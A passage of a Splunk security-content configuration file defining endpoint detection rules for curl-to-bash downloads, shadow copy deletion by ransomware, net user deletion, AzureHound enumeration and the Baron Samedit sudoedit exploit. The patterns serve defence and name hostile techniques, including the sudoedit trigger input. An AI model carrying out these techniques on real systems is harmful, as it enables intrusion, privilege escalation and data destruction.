which is the .net code. Aside from that, powershell is capable of using this compiler in executing .net code in a powershell script so filter on that case is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated powershell script taht execute .net code that may generate false positive. filter is needed. action.escu.creation_date = 2021-11-12 action.escu.modification_date = 2021-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - CSC Net On The Fly Compilation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CSC Net On The Fly Compilation - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1027.004", "T1027"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_csc` Processes.process = "*/noconfig*" Processes.process = "*/fullpaths*" Processes.process = "*@*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `csc_net_on_the_fly_compilation_filter` [ESCU - Curl Download and Bash Execution - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of curl on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of curl on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives should be limited, however filtering may be required. action.escu.creation_date = 2021-12-10 action.escu.modification_date = 2021-12-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Curl Download and Bash Execution - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ attempting to download a remote file and run it with bash. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Curl Download and Bash Execution - Rule action.correlationsearch.annotations = {"analytic_story": ["Ingress Tool Transfer", "Log4Shell CVE-2021-44228", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-44228"], "impact": 80, "kill_chain_phases": ["Command and Control"], "mitre_attack": ["T1105"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of curl on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j. action.notable.param.rule_title = Curl Download and Bash Execution action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=curl (Processes.process="*-s *") OR (Processes.process="*|*" AND Processes.process="*bash*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `curl_download_and_bash_execution_filter` [ESCU - Delete ShadowCopy With PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This following analytic detects PowerShell command to delete shadow copy using the WMIC PowerShell module. This technique was seen used by a recent adversary to deploy DarkSide Ransomware where it executed a child process of PowerShell to execute a hex encoded command to delete shadow copy. This hex encoded command was able to be decrypted by PowerShell log. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This following analytic detects PowerShell command to delete shadow copy using the WMIC PowerShell module. This technique was seen used by a recent adversary to deploy DarkSide Ransomware where it executed a child process of PowerShell to execute a hex encoded command to delete shadow copy. This hex encoded command was able to be decrypted by PowerShell log. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the powershell logs from your endpoints. make sure you enable needed registry to monitor this event. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-05-02 action.escu.modification_date = 2022-05-02 action.escu.confidence = high action.escu.full_search_name = ESCU - Delete ShadowCopy With PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware", "Revil Ransomware", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = An attempt to delete ShadowCopy was performed using PowerShell on $Computer$ by $User$. action.risk.param._risk = [{"risk_object_field": "UserID", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Delete ShadowCopy With PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware", "Revil Ransomware", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This following analytic detects PowerShell command to delete shadow copy using the WMIC PowerShell module. This technique was seen used by a recent adversary to deploy DarkSide Ransomware where it executed a child process of PowerShell to execute a hex encoded command to delete shadow copy. This hex encoded command was able to be decrypted by PowerShell log. action.notable.param.rule_title = Delete ShadowCopy With PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText= "*ShadowCopy*" (ScriptBlockText = "*Delete*" OR ScriptBlockText = "*Remove*") | stats count min(_time) as firstTime max(_time) as lastTime by Opcode Computer UserID EventCode ScriptBlockText | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `delete_shadowcopy_with_powershell_filter` [ESCU - Deleting Of Net Users - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic will detect a suspicious net.exe/net1.exe command-line to delete a user on a system. This technique may be use by an administrator for legitimate purposes, however this behavior has been used in the wild to impair some user or deleting adversaries tracks created during its lateral movement additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic will detect a suspicious net.exe/net1.exe command-line to delete a user on a system. This technique may be use by an administrator for legitimate purposes, however this behavior has been used in the wild to impair some user or deleting adversaries tracks created during its lateral movement additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = System administrators or scripts may delete user accounts via this technique. Filter as needed. action.escu.creation_date = 2023-06-13 action.escu.modification_date = 2023-06-13 action.escu.confidence = high action.escu.full_search_name = ESCU - Deleting Of Net Users - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["XMRig", "Graceful Wipe Out Attack", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to delete accounts. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 25}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deleting Of Net Users - Rule action.correlationsearch.annotations = {"analytic_story": ["XMRig", "Graceful Wipe Out Attack", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1531"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic will detect a suspicious net.exe/net1.exe command-line to delete a user on a system. This technique may be use by an administrator for legitimate purposes, however this behavior has been used in the wild to impair some user or deleting adversaries tracks created during its lateral movement additional systems. During triage, review parallel processes for additional behavior. Identify any other user accounts created before or after. action.notable.param.rule_title = Deleting Of Net Users action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process="*user*" AND Processes.process="*/delete*" by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `deleting_of_net_users_filter` [ESCU - Deleting Shadow Copies - Rule] action.escu = 0 action.escu.enabled = 1 description = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = vssadmin.exe and wmic.exe are standard applications shipped with modern versions of windows. They may be used by administrators to legitimately delete old backup copies, although this is typically rare. action.escu.creation_date = 2020-11-09 action.escu.modification_date = 2020-11-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Deleting Shadow Copies - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Log Manipulation", "SamSam Ransomware", "Ransomware", "Clop Ransomware", "CISA AA22-264A", "Prestige Ransomware", "Chaos Ransomware", "LockBit Ransomware", "DarkGate Malware", "Rhysida Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to delete shadow copies. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 81}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 81}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Deleting Shadow Copies - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Log Manipulation", "SamSam Ransomware", "Ransomware", "Clop Ransomware", "CISA AA22-264A", "Prestige Ransomware", "Chaos Ransomware", "LockBit Ransomware", "DarkGate Malware", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The vssadmin.exe utility is used to interact with the Volume Shadow Copy Service. Wmic is an interface to the Windows Management Instrumentation. This search looks for either of these tools being used to delete shadow copies. action.notable.param.rule_title = Deleting Shadow Copies action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=vssadmin.exe OR Processes.process_name=wmic.exe) Processes.process=*delete* Processes.process=*shadow* by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `deleting_shadow_copies_filter` [ESCU - Detect AzureHound Command-Line Arguments - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AzureHound Command-Line Arguments - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ using AzureHound to enumerate AzureAD. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AzureHound Command-Line Arguments - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the common command-line argument used by AzureHound `Invoke-AzureHound`. Being the script is FOSS, function names may be modified, but these changes are dependent upon the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover the entirety of every argument in order to avoid false positives. action.notable.param.rule_title = Detect AzureHound Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*invoke-azurehound*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.parent_process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_command_line_arguments_filter` [ESCU - Detect AzureHound File Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on file modifications that include the name of the process, and file, responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = False positives should be limited as the analytic is specific to a filename with extension .zip. Filter as needed. action.escu.creation_date = 2024-03-14 action.escu.modification_date = 2024-03-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect AzureHound File Modifications - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Discovery Techniques"] action.risk = 1 action.risk.param._risk_message = A file - $file_name$ was written to disk that is related to AzureHound, a AzureAD enumeration utility, has occurred on endpoint $dest$ by user $user$. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "file_name", "risk_object_type": "other", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect AzureHound File Modifications - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic is similar to SharpHound file modifications, but this instance covers the use of Invoke-AzureHound. AzureHound is the SharpHound equivilent but for Azure. It's possible this may never be seen in an environment as most attackers may execute this tool remotely. Once execution is complete, a zip file with a similar name will drop `20210601090751-azurecollection.zip`. In addition to the zip, multiple .json files will be written to disk, which are in the zip. action.notable.param.rule_title = Detect AzureHound File Modifications action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*-azurecollection.zip", "*-azprivroleadminrights.json", "*-azglobaladminrights.json", "*-azcloudappadmins.json", "*-azapplicationadmins.json") by Filesystem.file_create_time Filesystem.process_id Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.user | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_azurehound_file_modifications_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.escu.how_to_implement = Splunk Universal Forwarder running on Linux systems, capturing logs from the /var/log directory. The vulnerability is exposed when a non privledged user tries passing in a single \ character at the end of the command while using the shell and edit flags. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-01-27 action.escu.modification_date = 2021-01-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Baron Samedit CVE-2021-3156 - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Baron Samedit CVE-2021-3156"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "other", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Baron Samedit CVE-2021-3156 - Rule action.correlationsearch.annotations = {"analytic_story": ["Baron Samedit CVE-2021-3156"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-3156"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a specific type of vulnerability known as a heap-based buffer overflow in the sudoedit command, commonly referred to as Baron Samedit CVE-2021-3156. The detection is made by a Splunk query that searches for instances of the sudoedit command with the "-s" flag followed by a double quote. This combination of parameters is indicative of the vulnerability being exploited. The detection is important because it suggests that an attacker is attempting to exploit the Baron Samedit vulnerability. The Baron Samedit vulnerability allows an attacker to gain elevated privileges on a Linux system and run arbitrary code with root privileges, potentially leading to complete control over the affected system. The impact of a successful attack can be severe since it allows the attacker to bypass security measures and gain unauthorized access to sensitive data or systems. This can result in data breaches, unauthorized modifications, or even complete system compromise. Next steps include being aware of this vulnerability and actively monitoring any attempts to exploit it. By detecting and responding to such attacks in a timely manner, you can prevent or minimize the potential damage caused by the heap-based buffer overflow of sudoedit. action.notable.param.rule_title = Detect Baron Samedit CVE-2021-3156 action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `linux_hosts` "sudoedit -s \\" | `detect_baron_samedit_cve_2021_3156_filter` [ESCU - Detect Baron Samedit CVE-2021-3156 Segfault - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1068"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects the occurrence of a heap-based buffer overflow in sudoedit.The detection is made by using a Splunk query to identify Linux hosts where the terms "sudoedit" and "segfault" appear in the logs. The detection is important because the heap-based buffer overflow vulnerability in sudoedit can be exploited by attackers to gain elevated root privileges on a vulnerable system, which might lead to the compromise of sensitive data, unauthorized access, and other malicious activities. False positives might occur. Therefore, you must review the logs and investigate further before taking any action. action.escu.how_to_implement = Splunk Universal Forwarder running on Linux systems (tested on Centos and Ubuntu), where segfaults are being logged. This also captures instances where the exploit has been compiled into a binary. The detection looks for greater than 5 instances of sudoedit combined with segfault over your search time period on a single host action.escu.known_false_positives = If 